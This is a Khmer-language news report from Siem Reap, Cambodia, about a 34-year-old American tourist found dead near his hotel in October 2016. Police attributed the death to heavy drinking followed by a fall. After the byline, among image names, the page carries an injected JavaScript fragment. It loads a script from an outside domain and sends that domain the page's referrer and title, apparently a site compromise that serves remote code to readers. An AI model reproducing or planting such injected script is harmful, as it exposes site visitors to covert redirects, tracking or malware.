Leng Navatra – Sidebar Out Left
Leng Navatra – Banner Out Right

ជនជាតិអាមេរិកម្នាក់ បានដួលបោកក្បាលនៅលើការ៉ូបណ្ដាលឲ្យស្លាប់

សៀមរាប៖ នៅវេលាម៉ោង ០៦ៈ២០នាទីព្រឹកថ្ងៃទី៣០ ខែតុលា ឆ្នាំ២០១៦ សន្តិសុខសណ្ឋាគារម្នាក់បានប្រទះឃើញជនជាតិបរទេសម្នាក់ដេកស្លាប់នៅក្បែរសណ្ឋាគារលានជល់ដំរី ជ្រុងខាងកើត។ ករណីនេះកើតឡើងនៅភូមិមណ្ឌល់១ សង្កាត់ស្វាយដង្គុំ ក្រុង-ខេត្តសៀមរាប។លោកវរសេនីយ៍ទោ វ៉ាន់ រិទ្ធ នាយការិយាល័យនគរបាលអន្តោប្រវេសន៍ នៃស្នងការដ្ឋាននគរបាលខេត្តសៀមរាប បានឲ្យដឹងថា ជនរងគ្រោះមានឈ្មោះ PHILLIP HOUSTON ROLEN ភេទប្រុស អាយុ៣៤ឆ្នាំ ជនជាតិអាមេរិក ជាភ្ញៀវទេសចរណ៍ ចូលមកខេត្តសៀមរាបកាលពីថ្ងៃទី២៩ ខែតុលា ឆ្នាំ២០១៦ មកស្នាក់នៅសណ្ឋាគារកើតហេតុខាងលើ បន្ទប់លេខ៤០ ជាមួយប្រពន្ធ។

ប្រពន្ធនៃសព បានរៀបរាប់ប្រាប់សមត្ថកិច្ចនគរបាលយើងថា ជនរងគ្រោះបានផឹកស្រាស្រវឹងតាំងពីល្ងាច រហូតដល់ជិតភ្លឺ នៅតំបន់ផាប់ស្ទ្រីតទើបត្រឡប់មកសណ្ឋាគារវិញ។

ក្រោយពេលកើតហេតុសមត្ថកិច្ចនគរបាលបច្ចេកទេសវិទ្យាសាស្រ្ត និងលោកគូ្រពេទ្យអមតុលាការខេត្តសៀមរាបបានចុះទៅពិនិត្យសាកសព និងបានសន្និដ្ឋានថា ជនរងគ្រោះផឹកស្រាហួសកំណត់ អាចបណ្ដាលឲ្យគាំងបេះដួង ហើយដួលបោកក្បាលនៅលើការ៉ូបណ្ដាលឲ្យដាច់សសៃឈាមខួរក្បាលស្លាប់។
បច្ចុប្បន្នសពត្រូវបានដឹកយកទៅរក្សាទុកបណ្ដោះអាសន្ននៅមន្ទីរពេទ្យរ៉ូយ៉ាល់អង្គរ រងចាំមានការឯកភាពពីស្ថានទូតជាមុនសិន។

ដោយ រើត សុធី

img_4298 img_4299 img_4300s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

អត្ថបទដែលជាប់ទាក់ទង

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More